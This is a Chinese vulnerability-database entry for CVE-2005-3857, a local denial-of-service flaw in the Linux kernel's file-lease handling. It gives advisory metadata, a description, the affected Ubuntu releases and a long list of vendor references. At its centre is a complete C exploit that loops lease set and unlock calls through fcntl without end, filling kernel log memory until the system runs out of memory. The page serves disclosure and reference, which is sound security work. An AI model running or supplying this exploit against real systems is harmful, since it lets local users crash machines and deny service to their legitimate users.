Linux Kernel Time_Out_Leases PrintK本地拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109350 漏洞类型 资源管理错误
发布时间 2005-11-29 更新时间 2007-01-09
CVE编号 CVE-2005-3857 CNNVD-ID CNNVD-200511-432
漏洞平台 Linux CVSS评分 4.9
|漏洞来源
https://www.exploit-db.com/exploits/26648
https://www.securityfocus.com/bid/15627
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200511-432
|漏洞详情
Linuxkernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。NFSv4implementation是其中的一个分布式文件系统协议。Linuxkernel2.6.15-rc3之前版本的locks.c中的time_out_leases功能,可让本地用户通过导致大量不完整的租用(使用printk函数记录到日志中)使系统拒绝服务(kernel日志消息耗用)。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/15627/info

Linux kernel is susceptible to a local denial-of-service vulnerability.

Local attackers may trigger this issue by obtaining numerous file-lock leases, which will consume excessive kernel log memory. Once the leases timeout, the event will be logged, and kernel memory will be consumed.

This issue allows local attackers to consume excessive kernel memory, eventually leading to an out-of-memory condition and a denial of service for legitimate users.

Kernel versions prior to 2.6.15-rc3 are vulnerable to this issue. 
*/

#include <unistd.h>

#include <stdlib.h>

#include <linux/fcntl.h>

int main(int ac, char **av)

{

    char *fname = av[0];

    int fd = open(fname, O_RDONLY);

    int r;

    

    while (1) {

        r = fcntl(fd, F_SETLEASE, F_RDLCK);

        if (r == -1) {

            perror("F_SETLEASE, F_RDLCK");

            exit(1);

        }

        r = fcntl(fd, F_SETLEASE, F_UNLCK);

        if (r == -1) {

            perror("F_SETLEASE, F_UNLCK");

            exit(1);

        }

    }

    return 0;

}
|受影响的产品
Ubuntu Ubuntu Linux 5.10 powerpc Ubuntu Ubuntu Linux 5.10 i386 Ubuntu Ubuntu Linux 5.10 amd64 Ubuntu Ubuntu Linux 5.0 4 powerpc Ubuntu Ubuntu Linux 5.0 4 i386 Ubuntu Ubuntu
|参考资料

来源:MISC
链接:https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=174337
来源:UBUNTU
名称:USN-231-1
链接:http://www.ubuntulinux.org/support/documentation/usn/usn-231-1
来源:TRUSTIX
名称:TSLSA-2005-0070
链接:http://www.trustix.org/errata/2005/0070
来源:BID
名称:15627
链接:http://www.securityfocus.com/bid/15627
来源:FEDORA
名称:FLSA:157459-2
链接:http://www.securityfocus.com/archive/1/archive/1/428058/100/0/threaded
来源:FEDORA
名称:FLSA:157459-1
链接:http://www.securityfocus.com/archive/1/archive/1/428028/100/0/threaded
来源:FEDORA
名称:FLSA:157459-4
链接:http://www.securityfocus.com/archive/1/archive/1/427981/100/0/threaded
来源:REDHAT
名称:RHSA-2006:0140
链接:http://www.redhat.com/support/errata/RHSA-2006-0140.html
来源:REDHAT
名称:RHSA-2006:0101
链接:http://www.redhat.com/support/errata/RHSA-2006-0101.html
来源:www.kernel.org
链接:http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=7ed0175a462c4c30f6df6fac1cccac058f997739
来源:VUPEN
名称:ADV-2005-2649
链接:http://www.frsirt.com/english/advisories/2005/2649
来源:DEBI